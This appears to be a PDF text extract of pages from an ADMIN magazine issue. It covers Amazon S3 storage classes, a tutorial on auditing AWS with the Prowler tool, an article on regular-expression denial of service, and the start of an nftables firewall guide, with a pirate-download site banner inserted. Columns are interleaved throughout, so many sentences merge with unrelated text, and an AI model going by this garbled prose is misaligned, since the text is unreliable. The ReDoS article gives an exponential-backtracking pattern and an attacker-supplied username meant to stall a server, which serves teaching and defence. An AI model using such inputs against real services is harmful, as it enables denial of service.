zon S3 REST API. tioned, only four can be queried di- maintain persistent archive copies
Therefore, users can send REST re- rectly at any time because the Glacier of data that virtually never need to
quests either in the context of the de- and Glacier Deep Archive classes are be accessed. It could also make local
sired SDK or directly, where Amazon not applied to the S3 service with its tape libraries superfluous for many
S3 uses the default storage class for concept of buckets and objects; in- users. The low price of the archive
storing newly created objects without stead, it is applied to Amazon’s Glacier comes at the price of extended access
explicitly specifying the storage class archive service, which offers the same time. Accessing data stored in S3 Gla-
with --storage-class. stability as archive storage. However, cier Deep archives requires a delivery
Listing 1 shows an example of updat- the retrieval times are configurable time of 12 hours compared with a
ing the memory class for an existing between a few minutes and several few minutes (Expedited) or five hours
object in Java. Another example for hours. Immediate retrieval is not pos- (Standard) in Glacier.
uploading an object in Python 3 (with sible. Instead, users need to post a re-

Listing 1: Updating the Storage Class


Mass Batch for S3 Objects
The new Amazon Batch Opera-
01 AmazonS3Client s3Client = (AmazonS3Client)AmazonS3ClientBuilder.standard().withRegion(clientRegion).
tions feature was also presented at
withCredentials(new ProfileCredentialsProvider()).build();
re:Invent 2018 and is now available
02 CopyObjectRequest copyRequest = new CopyObjectRequest(sourceBucketName, sourceKey, as a preview. This feature lets admins
destinationBucketName, destinationKey).withStorageClass(StorageClass.ReducedRedundancy); manage billions of objects stored in
03 s3Client.copyObject(copyRequest); S3 with a single API call or a few
mouse clicks in the S3 console and

44 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
New S3 Services at Amazon CO N TA I N E R S A N D V I RT UA L I Z AT I O N

allows object properties or metadata API actions to S3 objects on a mas- For a start, users can specify a list
to be change for any number of S3 sive scale. The Batch Operations of target objects in an S3 inventory
objects. This approach also applies feature can also be used to perform report that lists all objects of an S3
to copying objects between buckets custom Lambda functions on billions bucket or prefix. Optionally, you can
or replacing tag sets, changing ac- or trillions of S3 objects, enabling specify your own list of target objects.
cess controls, or retrieving/restoring highly complex tasks, such as image You then select the desired API ac-
objects from S3 Glacier in minutes or video transcoding. Specifically, the tion from a prefilled options menu in
rather than months. feature takes care of retries, tracks the S3 Management Console. New S3
Until now, companies have often progress, sends notifications, gener- Batch Operations [3] are available in
had to spend months of development ates final reports, and delivers the all AWS regions now. Operations are
time writing optimized application events for all changes made and tasks charged at $0.25/job or $1.00/million
software that could apply the required performed to CloudTrail. object operations performed, on top
of charges associated with any opera-
tion S3 Batch Operations performs for
you (e.g., data transfer, requests, and
other charges).

Conclusions
Amazon S3 is far more than a file
storage facility on the Internet, and
even experienced users often don’t
know all of its capabilities, especially
because AWS is constantly adding
new features. Those who know the
access patterns to their data can save
a lot of money. Additionally, AWS
now provides a degree of automation
with the new S3 Intelligent-Tiering
memory class (at an extra charge). Q

Info
[1] Amazon S3 Service Level Agreement:
[https://aws.amazon.com/s3/sla/?nc1=h_ls]
[2] Prices for Amazon S3:
[https://aws.amazon.com/s3/pricing/?
nc1=h_ls]
[3] S3 Batch Operations:
Figure 2: The lifecycle guidelines in Amazon S3 can be determined from the management [https://docs.aws.amazon.com/AmazonS3/
user interface, as well. latest/user-guide/batch-ops.html]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 45
CONTAINERS AND VIRTUALIZATION Prowler for AWS Security

Prowling AWS

Snooping Around
Prowler is an AWS security best practices assessment, auditing, Organizations can segregate depart-
mental duties and, therefore, security
hardening, and forensics readiness tool. By Chris Binnie controls between multiple accounts;
commonly this might mean the use
Hearing that an external, indepen- you are involved with a project at of 20 or more accounts. With these
dent organization has been commis- the seminal greenfield stage, and you concerns and, if you blink a little too
sioned to spend time actively attack- have yet to learn what goes where slowly, it’s quite possible that you
ing the cloud estate you have been and how it all fits together. To add will miss a new AWS feature or ser-
tasked with helping to secure can be to the complexity, if you are using vice that needs to be understood and,
a little daunting – unless, of course, Amazon Web Services (AWS), AWS once deployed, secured.
Fret not, however, because a few open
Table 1: Checks and Group Names source tools can help mitigate the pain
Description No./Type of Checks Group Name before an external auditor or penetra-
Identity and access management 22 checks group 1 tion tester receives permission to
attack your precious cloud infrastruc-
Logging 9 checks group 2
ture. In this article, I show you how to
Monitoring 14 checks group 3
install and run the highly sophisticated
Networking 4 checks group 4 tool Prowler [1]. With the use of just a
Critical priority CIS CIS Level 1 cislevel1 handful of its many features, you can
Critical and high-priority CIS CIS Level 2 cislevel2 test against the industry-consensus
Extras 39 checks extras benchmarks from the Center for Inter-
Forensics See README file [4] forensics-ready net Security (CIS) [2].
GDPR See website [5] gdpr
HIPAA See website [6] hipaa What Are You Lookin’ At?
When you run Prowler against the
Listing 1: Installing Prowler overwhelmingly dominant cloud
$ git clone https://github.com/toniblyx/prowler.git provider AWS, you get the chance to
Lead Image © Dmitry Naumov, 123RF.com

apply an impressive 49 test criteria


Cloning into 'prowler'... of the AWS Foundations Benchmark.
remote: Enumerating objects: 50, done. For some additional context, sec-
remote: Counting objects: 100% (50/50), done. tions on the AWS Security Blog [3]
remote: Compressing objects: 100% (41/41), done.
are worth digging into further.
remote: Total 2955 (delta 6), reused 43 (delta 5), pack-reused 2905
To bring more to the party, the so-
Receiving objects: 100% (2955/2955), 971.57 KiB | 915.00 KiB/s, done.
phisticated Prowler also stealthily
Resolving deltas: 100% (1934/1934), done.
prowls for issues in compliance with

46 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Prowler for AWS Security CONTAINERS AND VIRTUALIZATION

General Data Protection Regulation Listing 2: Permissions for IAM Role


(GDPR) of the European Union and
{ "kms:get*",
the Health Insurance Portability
"Version": "2012-10-17", "kms:list*",
and Accountability Act (HIPAA) of
"Statement": [{ "lambda:getpolicy",
the United States. Prowler refers to
"Action": [ "lambda:listfunctions",
these 40 additional checks as “ex-
"acm:describecertificate", "logs:DescribeLogGroups",
tras”. Table 1 shows the type and "acm:listcertificates", "logs:DescribeMetricFilters",
number of checks that Prowler can "apigateway:get", "rds:describe*",
run, and the right-hand column of- "autoscaling:describe*", "rds:downloaddblogfileportion",
fers the group name you should use "cloudformation:describestack*", "rds:listtagsforresource",
to get Prowler to test against spe- "cloudformation:getstackpolicy", "redshift:describe*",
cific sets of checks. "cloudformation:gettemplate", "route53:getchange",
"cloudformation:liststack*", "route53:getcheckeripranges",
"cloudfront:get*", "route53:getgeolocation",
Porch Climbing "route53:gethealthcheck",
"cloudfront:list*",
To start getting your hands dirty, in- "cloudtrail:describetrails", "route53:gethealthcheckcount",
stall Prowler and see what it can do "cloudtrail:geteventselectors", "route53:gethealthchecklastfailurereason",
to help improve the visibility of your "cloudtrail:gettrailstatus", "route53:gethostedzone",
"cloudtrail:listtags", "route53:gethostedzonecount",
security issues. To begin, go to the
"cloudwatch:describe*", "route53:getreusabledelegationset",
GitHub page [1] held under author
"codecommit:batchgetrepositories", "route53:listgeolocations",
Toni de la Fuente’s account; he also
"codecommit:getbranch", "route53:listhealthchecks",
has a useful blogging site [7] that
"codecommit:getobjectidentifier", "route53:listhostedzones",
offers a number of useful insights
"codecommit:getrepository", "route53:listhostedzonesbyname",
into the vast landscape of security "codecommit:list*", "route53:listqueryloggingconfigs",
tools available to users these days "codedeploy:batch*", "route53:listresourcerecordsets",
and where to find them. I recom- "codedeploy:get*", "route53:listreusabledelegationsets",
mend a visit, whatever your level of "codedeploy:list*", "route53:listtagsforresource",
experience. "config:deliver*", "route53:listtagsforresources",
The next step is cloning the repository "config:describe*", "route53domains:getdomaindetail",
with the git command [8] (Listing "config:get*", "route53domains:getoperationdetail",
1). As you can see at the beginning of "datapipeline:describeobjects", "route53domains:listdomains",
the command’s output, the prowler/ "datapipeline:describepipelines", "route53domains:listoperations",
directory will hold the code. "datapipeline:evaluateexpression", "route53domains:listtagsfordomain",
The README file recommends "datapipeline:getpipelinedefinition", "s3:getbucket*",
installing the ansi2html and detect- "datapipeline:listpipelines", "s3:getlifecycleconfiguration",
secrets packages with the pip Python "datapipeline:queryobjects", "s3:getobjectacl",
"datapipeline:validatepipelinedefinition", "s3:getobjectversionacl",
package installer:
"directconnect:describe*", "s3:listallmybuckets",
"dynamodb:listtables", "sdb:domainmetadata",
$ pip install awscli ansi2html U
"ec2:describe*", "sdb:listdomains",
detect-secrets
"ecr:describe*", "ses:getidentitydkimattributes",
"ecs:describe*", "ses:getidentityverificationattributes",
If you don’t have pip installed, fret "ecs:list*", "ses:listidentities",
not: Use your package manager. For "elasticache:describe*", "ses:listverifiedemailaddresses",
example, on Debian derivatives, use "elasticbeanstalk:describe*", "ses:sendemail",
the apt command: "elasticloadbalancing:describe*", "sns:gettopicattributes",
"elasticmapreduce:describejobflows", "sns:listsubscriptionsbytopic",
$ apt install python-pip "elasticmapreduce:listclusters", "sns:listtopics",
"es:describeelasticsearchdomainconfig", "sqs:getqueueattributes",
On Red Hat Enterprise Linux child "es:listdomainnames", "sqs:listqueues",
distributions and others like open- "firehose:describe*", "support:describetrustedadvisorchecks",
SUSE or Arch Linux, you can find in- "firehose:list*", "tag:getresources",
structions online [9] for help if you’re "glacier:listvaults", "tag:gettagkeys"
not sure of the package names. "guardduty:listdetectors", ],
"iam:generatecredentialreport", "Effect": "Allow",
Now you’re just about set to run
"iam:get*", "Resource": "*"
Prowler from a local machine perspec-
"iam:list*", }]
tive. Before continuing, however, the
"kms:describe*", }
other part of the process is configuring

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 47
CONTAINERS AND VIRTUALIZATION Prowler for AWS Security

the correct AWS Identity and Access


Management (IAM) permissions.
An Access Key and a Secret Key at-
tached to a user is needed from AWS,
with the correct permissions being
made available to the user via a role.
Don’t worry, though: The permissions
aren’t giving away the crown jewels but
reveal any potential holes in your secu-
rity posture. Therefore, the results need
to be stored somewhere with care, as
do all access credentials to AWS.
You might call the List/Read/Describe
actions “read-only” if you wanted to
summarize succinctly the levels of
access required by Prowler. You can Figure 1: Creating the user’s Access Key and Secret Key in AWS in the IAM service.
either use the SecurityAudit policy
permissions, which is provided by you should click the Create access key enter with cut and paste. Once you’ve
AWS directly, or the custom set of per- button at the bottom and then safely filled in those details, two files are cre-
missions in Listing 2 required by the store the details. ated in plain text and stored in the ./
role to be attached to the user in IAM, To make use of the Access Key and aws directory: config and credentials.
which opens up the DescribeTrust- Secret Key you’ve just generated, re- Because these keys are plain text,
edAdvisorChecks, in addition to those turn to the terminal and enter: many developers use environment
offered by the SecurityAudit policy, ac- variables to populate their terminal
cording to the GitHub README file. $ aws configure with these details so they’re ephem-
Have a close look at the permis- AWS Access Key ID []: eral and not saved in a visible format.
sions to make sure you’re happy Wherever you keep them, you should
with them. As you can see, a lot of The aws command became available encrypt them when stored – known as
list and get actions cover a mas- when you installed the AWS command- “data at rest” in security terms.
sive amount of AWS’s ever-growing line tool with the pip package manager.
number of services. In a moment, I’ll As you will see from the questions Lurking
return to this policy after setting up asked by that command, you need to
the AWS configuration. offer a few defaults, such as the pre- Back in your browser and the AWS
ferred AWS region, the output format, IAM service, you can see in Figure 2
Gate Jumping and, most importantly, your Access where to paste the policy content
Key and Secret Key, which you can shown in Listing 2 (i.e., the Policies
For those who
aren’t familiar
with the process
of setting up
credentials for
AWS, I’ll zoom
through them
briefly. The obvi-
ous focus will
be on Prowler in
action.
In the redacted
Figure 1, you can
see the screen
found in the IAM
service under the
Users | Security
credentials tab.
Because you’re
only shown the
secret key once, Figure 2: Creating the IAM policy for Prowler.

48 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Prowler for AWS Security CONTAINERS AND VIRTUALIZATION

Figure 3: Happiness is a successfully


created IAM policy for Prowler.

| Create policy page). After carefully


pasting all of Listing 2 into the JSON
tab, click the blue Review policy but-
ton at the bottom of the screen. Just Figure 4: Prepare to choose your Prowler policy.
make sure you paste over the existing
empty JSON policy to remove it be- Now you can run your tests. A rela- to run this type of audit frequently to
fore proceeding, and you’ll be fine. tively healthy smattering of patience help spot issues or misconfigurations
On the following screen, you’re re- is required for your first run. As you’d that you’d have otherwise missed.
quired to provide a sensible name for expect because of the Herculean task
the policy (e.g., prowler-audit-policy), being attempted by Prowler, it takes Grand Theft AWS
check the policy rules displayed, and a good few minutes to complete. The
click the blue button at the bottom of redacted Figure 5 shows the begin- Once the stealthy Prowler has fin-
the page to proceed. ning of an in-depth audit. ished its business, you have a num-
Figure 3 shows success, and you can As the AWS audit continues, you can ber of other ways to tune it for your
now attach your shiny new policy to see the impressive test coverage being needs that you might want to explore.
your user (or role, if you prefer, hav- performed against the AWS account For example, if you have multiple
ing attached the role to your user). (Figure 6). If your permissions are AWS accounts over which you want
The final AWS step is attaching your safe in the IAM policy, then other to run Prowler, you can interpolate
policy to your user, as seen in Figure than using up some of your concur- the name of the account profile in
4. In the IAM service, click Users, rent API request limits it’s a good idea your ~/.aws/credentials file:
choose your user, then click Add
permissions and select a policy. Next,
click Attach existing policies directly,
tick the box beside prowler-audit-
policy to select it, and click the blue
Next: Review button.
On the next screen, click Add permis-
sions; lo and behold, you’ll see your
new policy under Attached directly.
If you failed to get that far, just re-
trace your steps. It’s not tricky once
you are familiar with the process.

Prowling
Figure 5: Prowler sets itself up at the start of the auditing run with useful colored output
To recap, you have created an AWS for clarity as it goes.
user and attached your newly cre-
ated policy to that user. Good practice
would usually be to create an IAM
role, too, and then attach the policy
to the new role if multiple users need
to access the policy. The command
aws configure lets the AWS command-
line client know exactly where to find
your credentials.
You can now cd to your prowler di-
rectory to run the script that fires up
Prowler. You probably remember that
the directory was created during the
GitHub repository cloning process in
the early stages. Figure 6: The tests are extremely thorough and well considered.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 49
CONTAINERS AND VIRTUALIZATION Prowler for AWS Security

$ ./prowler -p custom-profile -r eu-west-1 $ ./prowler | ansi2html -la > U and considered documentation, and
prowler-audit.html is a lightweight and reliable piece of
Although the command only points at software. I prefer the HTML reports,
one region, Prowler will traverse the Similarly, you can output to JSON or but running the JSON through the
other regions where needed to com- CSV with the -M switch: jq program is also useful for easy-to-
plete its auditing. read output.
$ ./prowler -M json > prowler-audit.json Having scratched the surface of this
Breaking and Entering clever open source tool, I trust you’ll
Just change json to csv (in the file be tempted to do the same and to
The README file offers some other name, too) if you prefer a CSV file. keep an eye on your security issues in
useful options in the examples I shame- The well-written Prowler docs also of- an automated fashion. Q
lessly repeat and show in this section. fer a nice example of saving a report
If you ever want to check one of the to an S3 bucket:
tests individually, use: Info
$ ./prowler -M json | aws s3 cp - U [1] Prowler:
$ ./prowler -c check32 s3://your-bucket/prowler-audit.json [https://github.com/toniblyx/prowler]
[2] CIS: [https://www.cisecurity.org]
After the first Prowler run to make Finally, if you’ve worked with security [3] AWS Security Blog:
sure it runs correctly, then a handy audits before, you’ll know that reach- [https://aws.amazon.com/blogs/security/
tip is to spend some time looking ing an agreed level of compliance is tag/cis-aws-foundations-benchmark/]
through the benchmarks listed earlier the norm; therefore if, for example, you [4] Prowler README:
to figure out what you might need only needed to meet the requirements [https://github.com/toniblyx/prowler/blob/
to audit against, instead of running of CIS Benchmark Level 1, you could master/README.md]
through all the many checks. ask Prowler to focus on those checks [5] GDPR: [https://ico.org.uk/for-
It’s also not such a bad idea if you only: organisations/guide-to-data-protection/
find the check numbers from the guide-to-the-general-data-protection-
Prowler output and focus on spe- $ ./prowler -g cislevel1 regulation-gdpr/]
cific areas to speed up your report [6] HIPAA: [https://www.hhs.gov/
generation time. Just delimit your If you want to check against hipaa/for-professionals/security/
list of checks with commas after the multiple AWS accounts at once, then laws-regulations/index.html]
-c switch. refer to the README file for a clever [7] Toni de la Fuente: [https://blyx.com]
Additionally, use the -E command one-line command that runs Prowler [8] Git: [https://git-scm.com/book/en/v2/
switch across your accounts in parallel. A Getting-Started-Installing-Git]
useful bootstrap script is offered, as [9] Linux package managers:
$ ./prowler -E check17,check24 well, to help you set up your AWS [https://packaging.python.org/guides/
credentials via the AWS client and installing-using-linux-tools]
to run Prowler against lots of checks run Prowler, so it’s definitely worth
while excluding only a few. a read.
Additionally, a nice troubleshooting The Author
Lookin’ Oh So Pretty section looks at common errors and Chris Binnie’s latest book, Linux Server
the use of multifactor authentica- Security: Hack and Defend, shows how hackers
As you’d expect, Prowler produces tion (MFA). Suffice it to say that the launch sophisticated attacks to compromise
a nicely formatted text file for your README file is comprehensive, easy servers, steal data, and crack complex
auditing report, but harking back to to follow, and puts some other docu- passwords, so you can learn how to defend
the pip command earlier, you might mentation to shame. against such attacks. In the book, he also shows
remember that you also installed you how to make your servers invisible, perform
the ansi2html package, which al- The End Is Nigh penetration testing, and mitigate unwelcome
lows the mighty Prowler to produce attacks. You can find out more about DevOps,
HTML by piping the output of your Prowler boasts a number of checks DevSecOps, Containers, and Linux security on
results: that other tools miss, has thorough his website: https://www.devsecops.cc.

50 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
S EC U R I T Y Regex Vulnerabilities

Regular expression security

Pass the Test The regular expression after the @


Regular expressions are invaluable for checking user input, but a
checks domain names, which begin
vulnerability could make them ripe for exploitation. By Matthias Wübbeling with at least one character, number,
or hyphen (+), with an optional ex-
One important paradigm in software sortium recommends the following tension (*) comprising a period (zero
development, especially web appli- regular expression for the language of or more times) and at least one of the
cations, is careful validation of user email addresses: characters of the class that follows.
input before allowing further process- The dot also has a special meaning
ing. Much can go wrong if the input ^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+U for regular expressions: It stands for
is not carefully checked. SQL injec- @[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*$ any character. If you really expect a
tion and cross-site scripting attacks dot at a location, you need to insert a
are just two of the most common When you see a string like this for backslash in front (e.g., \., as in the
examples of exploitation. Regular ex- the first time, the semantics are not example) to “escape” the character).
pressions are useful for checking user immediately apparent, but regular ex- If you adhere to all these require-
input, but even they are vulnerable pressions form a language that is ac- ments, you can generate words in the
to attacks. In this article, I show you tually quite easy to understand. The regular language of email addresses.
how to check your regular expres- two characters ^ and $ describe the Regular expressions also allow the
sions for vulnerabilities. start and end of input, respectively. logical AND and OR operations. The
The parentheses form groups and the AND operation is implicit outside of a
Regular Expressions square brackets ([ ]) classes of ad- class, whereas within a class, charac-
missible input characters. In this case, ters are implicitly linked with OR. The
Regular expressions (regex) have no value other than those that would | character is used to stipulate an ex-
become an established method of appear in an email address may be plicit OR; for example, a|b stands for
validating user input before process- present in the input. The first class a character that is either a or b. The
ing to describe and check for permit- in the example comprises a-z (all expression is equivalent to the class
ted entries and to prevent certain lowercase letters), A-Z (all uppercase [ab]. If you want to check the string
characters (e.g., those with a special letters), 0-9 (all digits), and all the for email addresses, you can use the
function in an application) from being special characters specified up to the Python console (Figure 1).
entered. Unfortunately, some regular right square bracket.
expressions can still cause unwanted Certain symbols define the frequency State Machines
behavior with certain types of input of occurrence of any characters in a
and make the script unusable – much group or class: ? (zero or one time), State machines are used to test
Lead Image © Jakub Jirsak, 123RF.com

like a denial of service attack. + (one or more times), and * (zero or whether a word is part of a language
A regular expression describes a more times). The plus sign that appears – for example, whether the user input
language, wherein you define the after the first closing square bracket is an email address. If this doesn’t
language that you want to accept as and in front of the @ sign therefore says mean anything to you, just imagine
input for an application. Email ad- that the @ symbol of an email address a ticket vending machine for the
dresses provide a simple but useful must be preceded by at least one to any subway or a train. It assumes differ-
example. The World Wide Web Con- number of the specified characters. ent states (e.g., the welcome screen,

52 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Regex Vulnerabilities S EC U R I T Y

Figure 1: Checking a regular expression for correctness in the Python console.

ticket selection, payment, or ticket word is part of the language, and the ^(a+)+$
printout) and expects different types state machine accepts it. If further
of input from the operator that cause characters are read from the input, At first glance this does not seem to be
a transition from one state to another. the machine proceeds to state 3 and a problematic expression; for example,
If all the user input matches the pre- does not accept the input. the input aaaa has only 16 (2^4) pos-
viously defined input language, the For each regular expression in your sible sequences of state transitions.
machine accepts the input and prints application, you can create state ma- However, if you enter a 16 times, you
a ticket. chines and use them to check the in- already have 2^16 = 65,536 possible
State machines that check whether put. State machines can become quite sequences, all of which need to be
an input word is part of a language large, with many states and transi- checked. The number doubles with
work in the same way. Each letter of tions. In particular, relations with + each additional a in the input.
an input word changes the state of and * quantifiers, large classes, or the Occasionally, developers also use
the machine. If the state machine is dot (.) for all possible input symbols user input to create regular expres-
in an accepting state after the input, lead to very large state machines. sions. Imagine you want to prevent a
the word is part of the language. Fig- username from being included in the
ure 2 shows a simple state machine Attack with ReDoS password you are using. If an attacker
with four states and the transitions chooses (a+)+ as the username and
between these states. State 1 is ac- A state machine’s performance when types a 40 times as the password, the
cepting, all other states are not. The checking regular expressions depends state machine would have to check
state machine has an input alphabet on many factors: the size of the state 2^40 possible sequences. An attacker
that comprises only the letters a and machine (i.e., the number of states could thus deliberately cause a denial
b. Words are accepted in which an a and transitions) and, of course, the of service if they had some idea of how
is followed by another a or a b. The input. A state machine checks each the application checked user input.
state machine is equivalent to the possible sequence of states in turn
regular expression: until it accepts one of the sequences, Conclusions
which means, in the worst case, the
^a[ab]+$ run time for a state machine that Regular expressions are useful for
checks a regular expression can grow checking user input and are deployed
If the input word starts with a b, the exponentially in relation to the input. in web applications and on firewalls
machine changes to state 3. From More bad news is that you often don’t or proxy servers. However, they also
this state, it cannot transition to any even notice that a regular expression have pitfalls that are not immediately
other state, especially not the accept- results in a large state machine with a obvious. For this reason, you should
ing state 1, which means the word correspondingly long run time. always test the regular expressions
input is not part of the language and The Open Web Application Security you use intensively, because the dam-
is not accepted. If it reads an a first, Project (OWASP) lists the regular ex- age potential is not always apparent.
the machine switches to state 2. From pression denial of service (ReDoS) [1] If you have inadvertently developed a
there, either an a or b will cause it as an attack and shows some regular vulnerable regular expression, some-
to transition to the accepting state 1. expressions that have unexpectedly times simple adjustments or tolerable
If this terminates the input, then the bad worst-case run times, such as: inaccuracy in the recognition process
can make a broken or unsafe regular
expression work safely. Q

Info
[1] ReDoS: [https://www.owasp.org/index.
php/Regular_expression_Denial_of_Ser-
Figure 2: A state machine determines whether the user input is part of the specified language. vice_-_ReDoS]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 53
MAG DOWN LOAD.oRG

LATEST MAGAZINES
HIGH QUAllTY TRUE-PDF
MAG DOWN LOAD.ORG
S EC U R I T Y nftables

Linux nftables packet filter

Screened
The latest nftables packet filter implementation, now available in the Linux kernel, promises
better performance and simpler syntax and operation. By Thorsten Scherf

The Linux kernel already contains a Parts of the old Netfilter framework classification is now far more sophis-
variety of packet filters, starting with use nftables, removing the need to ticated and elegant than it was in the
ipfwadm and followed by ipchains and develop new hooks, which are noth- days of iptables. For example, address
iptables. Kernel 3.13 saw the intro- ing more than certain points in the families now allow you to process
duction of nftables [1], which uses the network stack of the Linux kernel different packages with a single rule.
nft tool to create and manage rules. at which a packet is inspected and, If you wanted to examine IPv4 and
With the help of its own virtual ma- in the case of a match, one or more IPv6 packets in the past, you not only
Lead Image © alphaspirit, 123RF.com

chine, nftables ensures that rulesets actions executed. For this purpose, needed different rules, you even had
are converted into bytecode, which is tables that store chains exist at these to load them into the kernel with dif-
then loaded into the kernel. Not only hook points. The chains in turn con- ferent tools: iptables and ip6tables.
does it improve performance, but it tain the rules. The simple nftables inet table type
also allows administrators to enable The way in which the individual pack- includes both IPv4 and IPv6. Now,
new rules dynamically without having ets are now checked against the rules you can also merge different state-
to reload the entire ruleset. is another new feature of nftables. The ments with nftables. With iptables,

54 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
nftables S EC U R I T Y

writing a packet to the log first and Listing 1: modinfo nf_tables


then performing another action, such
# modinfo nf_tables
as dropping the packet, was a very
filename: /lib/modules/4.20.5-200.fc29.x86_64/kernel/net/netfilter/nf_tables.ko.xz
roundabout approach that required
alias: nfnetlink-subsys-10
two rules:
author: Patrick McHardy <kaber@trash.net>
license: GPL
iptables -A INPUT -p tcp U
depends: nfnetlink
--dport 23 -j LOG
retpoline: Y
iptables -A INPUT -p tcp U
intree: Y
--dport 23 -j DROP
name: nf_tables
vermagic: 4.20.5-200.fc29.x86_64 SMP mod_unload
With nftables, this is reduced to a
sig_id: PKCS#7
single rule:
signer:
sig_key:
nft add rule filter input tcp U
sig_hashalgo: md4
dport 23 log drop

This kind of facilitation can be Kernel-Dependent Routing in the Linux kernel by the /proc/sys/
found at many different places in Because the old Netfilter hooks are still net/ipv4/ip_forward or /proc/sys/net/
nftables. used, the route of a packet through the ipv6/ip_forward file. In this case, the
In addition to the hooks, nftables network stack with nftables is similar package only passes through the
continues to use Netfilter code for to that of Netfilter (Figure 1): In prerouting, forward, and postrouting
connection tracking, network address prerouting, a decision is made as to hooks.
translation (NAT), userspace queu- whether a network packet is either In these three hooks, the packet can
ing, and logging. The compatibility intended for a process on the lo- be rewritten by NAT in terms of the
layer is very helpful if you are migrat- cal machine or simply needs to be IP address and the port. Nftables al-
ing from iptables, because it lets you forwarded in-line with the routing lows changes to the target address
continue using the iptables netfilter table. In the first case, the package for the prerouting and input hooks,
tool, even if the underlying frame- reaches the local process by way and to the sender’s address for the
work is now nftables, not Netfilter. of the input entry point, where it is postrouting and output hooks. If you
If you don’t need Netfilter and prefer processed. It then passes through want to filter the packet instead, you
to have all new features available the output and postrouting hooks can create corresponding tables in
instead, you can use the new nft tool before leaving the network stack the input, forward, or output hooks
instead. again. and store your rulesets there. An-
To make sure the kernel you are us- If the package is not intended for a other innovation in nftables is the
ing supports nftables, call the modinfo local process, though, routing is per- new ingress entry point, which
tool (Listing 1). You should then see formed on the basis of existing rout- allows the filtering of packets on
some information about the nf_tables ing entries. Make sure that the kernel Layer 2, providing functions similar
kernel module. supports this routing, which is defined to the tc (traffic control) [2] tool.
Unlike Netfilter, nftables has no
predefined constructs for tables and
chains in which the actual rules end
up. Administrators need to create
these themselves with the nft tool:

nft add|list|flush|delete table|U


chain|rule <options>

If you now want to create a new


table, you must consider a few
points. For example, it is essential to
assign an address family to a table.
The following address families are
provided by nftables: ip, ip6, inet,
bridge, arp, and netdev. Although
Figure 1: nftables uses the hooks already known from Netfilter. However, the ingress the first four families can be used
entry point, which also supports Layer 2 filtering, is new. in all hooks, nftables only allows

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 55
S EC U R I T Y nftables

Listing 2: nft list ruleset Creating a New Chain In the following example, I present
some simple rules to give you a feel
nft list ruleset -a The next step is to create a new for the new nftables syntax. The first
table inet firewall { chain within this table that has the rule ensures that nftables accepts all
chain incoming { task of incorporating the rules. As packets passing through the loopback
type filter hook input priority 0; policy accept; with the address families, which are interface:
iif "lo" accept # handle 5 linked with tables, different types of
ct state established,related accept # handle 7 chains exist: filter, nat, and route. nft add rule inet firewall incoming U
tcp dport ssh ct state new accept # handle 8 The filter chains can be created in iif lo accept
drop # handle 9 all hooks; nat chains are allowed in
} prerouting, input, output, and pos- Furthermore, new SSH connec-
} trouting hooks; and route chains tions (ct state new) to port 22 will
can only be created in output hooks. be allowed (tcp dport 22). Packets
Because the purpose of this example that belong to existing SSH con-
Listing 3: Revised Ruleset is to filter IP packets for a local com- nections are also allowed (ct state
nft list table inet firewall puter, you need to create a filter established,related) and are detected
table inet firewall { chain, assign it to the previously by nftables connection tracking. All
chain smtp-chain { created firewall table, and specify other packets are dropped:
counter packets 1 bytes 80 where in the network stack it should
} be placed: nft add rule inet firewall incoming U
chain incoming { ct state established,related accept
type filter hook input priority 0; policy accept; nft create chain inet firewall incoming { U nft add rule inet firewall incoming U
iif "lo" accept type filter hook input priority 0\; } tcp dport 22 ct state new accept
ct state established,related accept nft add rule inet firewall incoming drop
tcp dport ssh ct state new accept You have now successfully created
tcp dport https ct state new accept a base chain for filtering IP packets The individual objects and their hier-
tcp dport smtp ct state new jump smtp-chain within the firewall table, defined a archy are now displayed by nftables
drop default priority, and named the chain with nft list ruleset (Listing 2).
} incoming. The call to nft list chains The -a option ensures that the in-
} confirms that everything worked suc- ternal enumeration (handles) of the
cessfully: individual rules is also displayed. A
new rule can be inserted later easily
the arp address family in tables nft list chains enough with the command:
that are created as part of the in- table inet firewall {
put or output hooks, and netdev is chain incoming { nft add rule inet firewall incoming U
only allowed for ingress tables. If type filter hook input priority 0; U position 4 tcp dport 443 U
no address family is specified when policy accept; ct state new accept
creating a table, nftables uses ip by }
default. } This rule now also allows all new
To load rulesets into the kernel that connections to secure HTTPS port
ensure that both IPv4 and IPv6 pack- Within this chain you can then cre- 443. You do not have to worry about
ets are checked for their properties ate rules that ensure that incoming packets that belong to existing con-
and filtered, you need to create a and outgoing packets are inspected nections at this point, because they
table with the inet address family. In according to certain criteria, such as are already detected and accepted
the following example, this table is the source and target IP addresses, by the connection tracking match
named firewall: source or target ports, or state with handle 7. The matches already
variables (e.g., membership of an mentioned above are extremely
nft add table inet firewall existing connection). If all these cri- diverse in nftables and allow very
teria apply to a data packet flowing complex rulesets [3]. Thanks to
A call to nft list tables confirms through the network stack and thus tcpdump-based syntax, however, they
that the table was created correctly: through each Netfilter hook, a match look quite compact and can be un-
has occurred, and a specific action is derstood intuitively.
nft list tables inet performed. This action should also
table inet firewall be defined as a rule. For example, Flexible Sorting of Rules
you can tell nftables to accept or re-
If needed, you can limit the output to ject the packet in a match, or simply If you want to add some order into
certain address families. create a log entry. your rulesets, you can do this with

56 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
nftables S EC U R I T Y

some of the other new nftables Listing 4: Complete Ruleset


features. For example, rules can be
nft list ruleset
sorted very easily with the help of
table inet firewall {
non-base chains. However, they are
set audit-servers {
not assigned directly to an entry point
type ipv4_addr
in the kernel and therefore do not see
elements = { 10.1.0.1, 192.168.0.1 }
any network traffic. That said, you
}
can jump from other chains into these
set http-servers {
non-base chains and thus evaluate
type ipv4_addr
the rules that exist there.
elements = { 10.1.1.1, 192.168.1.1 }
The idea behind this functionality
}
is that a multitude of rules can be
chain forward {
sorted logically in a very simple and
type filter hook forward priority 0; policy accept;
elegant way. The following example
